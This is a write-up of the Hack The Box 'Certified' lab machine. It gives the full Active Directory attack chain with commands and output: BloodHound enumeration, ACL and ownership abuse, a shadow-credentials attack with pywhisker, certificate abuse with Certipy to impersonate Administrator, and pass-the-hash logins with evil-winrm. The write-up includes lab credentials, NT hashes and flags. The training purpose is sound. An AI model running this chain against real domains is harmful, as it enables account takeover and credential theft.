Hackthebox: Certified

Foued SAIDI Lv4
  2025-03-14 17:28:50 2025-03-14 17:28:50 Created   2025-03-14 18:54:39 2025-03-14 18:54:39 Updated    

Overview

Certified is a medium-difficulty machine from Hack The Box dealing initially with provided credentials that will allow us to enumerate the DC through BloodHound. We’ll then abuse judith’s WriteOwner over the MANAGEMENT group to make her owner and add herself to the group so she’ll be able to abuse msDS-KeyCredentialLink over svc_management user to request a certificate on his behalf and get user flag. Finally we’ll abuse svc_management’s GenericAll on ca_operator to change his upn to the administrator and request a certificate on his behalf to get a hold to his NTLM Hash.

Certified-info-card
Certified-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(kali㉿kali)-[~]
└─$ nmap -A -Pn 10.129.22.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 13:32 EST
Nmap scan report for 10.129.22.253
Host is up (0.12s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-06 01:37:30Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-06T01:38:53+00:00; +7h04m53s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-06T01:38:54+00:00; +7h04m52s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-06T01:38:53+00:00; +7h04m53s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-06T01:38:54+00:00; +7h04m52s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-06T01:38:15
|_  start_date: N/A
|_clock-skew: mean: 7h04m52s, deviation: 0s, median: 7h04m52s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.95 seconds

We can see that we have out typical AD DC ports open.

One more thing, is that credentials were supplied with the box: Username: judith.mader Password: judith09

Bloodhound Enumeration

We can use the provided credentials alongside the bloodhound-python tool to gather intel on the machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ bloodhound-python -d certified.htb -c all -u judith.mader -p 'judith09' -ns 10.129.22.253 --zip
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 16S
INFO: Compressing output into 20250314235232_bloodhound.zip

We can first set judith as an owned user, then we can see that she has WriteOwner on the MANAGEMENT group which has GenericWrite on MANAGEMENT_SVC user who can PSRemote to the DC. So what we’ll be doing now is first add ourselves as owner of MANAGEMENT group, then add ourselves as a member to later abuse the GenericWrite functionality.

BloodHound Enumeration
BloodHound Enumeration

Foothold

Adding judith as Owner to MANAGEMENT group

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ impacket-owneredit -action write -new-owner 'judith.mader' -target 'management' 'certified/judith.mader':'judith09' -dc-ip 10.129.22.253 
<snip>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
                                                                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$

Granting judith WriteMembers permissions

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
<snip>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250315-000215.bak
[*] DACL modified successfully!

Adding judith as member of MANANEGEMENT

1
2
┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

Note: this will not return a message after success

We will use pywhisker tool from github to modify the msDS-KeyCredentialLink attribute of svc_management and eventually get his NTLM hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ python3 pywhisker.py  --dc-ip 10.129.22.253 -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"  
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: b408c279-49d2-1cf9-a680-792376ef3f43
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: O5DKZp1j.pfx
[*] Must be used with password: E1oblaZPhYWbHhc8Z169
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
                                                                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad cert -export -pfx "/home/kali/Hackthebox/Certified/pywhisker/O5DKZp1j.pfx" -password "E1oblaZPhYWbHhc8Z169" -out "unprotected.pfx"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unprotected.pfx'
                                                                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad auth -pfx unprotected.pfx -dc-ip '10.129.22.253' -username 'management_svc' -domain 'certified.htb' 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584

And we got it!

Now we can grab our user flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ evil-winrm -i 10.129.22.253 -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> type ../desktop/user.txt
15df55cc8b45dd564d9e16cdc7ce4196
*Evil-WinRM* PS C:\Users\management_svc\Documents>

Privilege Escalation

Looking at the privilege svc_management has, we can see he has GenericAll on ca_operator. What we can do is change ca_operator’s password, update his UPN to the administrator’s, request a certificate using certipy then authenticate to the administrator to get his hashes.

Changing ca_operator password

1
2
3
4
5
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ pth-net rpc password "ca_operator" "NewPasswordKujen@2025#" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "DC01.certified.htb" 
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

Change ca_operator UPN to administrator

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad  account update -username [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

Request a certificate through ADCS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad  req -username [email protected] -p NewPasswordKujen@2025# -ca certified-DC01-CA -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
  "(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[+] Trying to resolve 'CERTIFIED.HTB' at '192.168.235.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.129.22.253
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.22.253[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.22.253[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

And now we can auth to the user and get his hash:

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad auth -pfx administrator.pfx -domain certified.htb 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

And we can now claim our root flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ evil-winrm -i 10.129.22.253 -u administrator -H '0d5b49608bbce1751f708748f67e2d34'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
a3bee3c7ebc8c6dc7f0bf15e791c1f84
*Evil-WinRM* PS C:\Users\Administrator\Documents>

That was it for Certified, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Certified
  • Author: Foued SAIDI
  • Created at : 2025-03-14 17:28:50
  • Updated at : 2025-03-14 18:54:39
  • Link: https://kujen5.github.io/2025/03/14/Hackthebox-Certified/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: Certified
  1. Overview
  2. Reconnaissance
  3. Foothold
  4. Privilege Escalation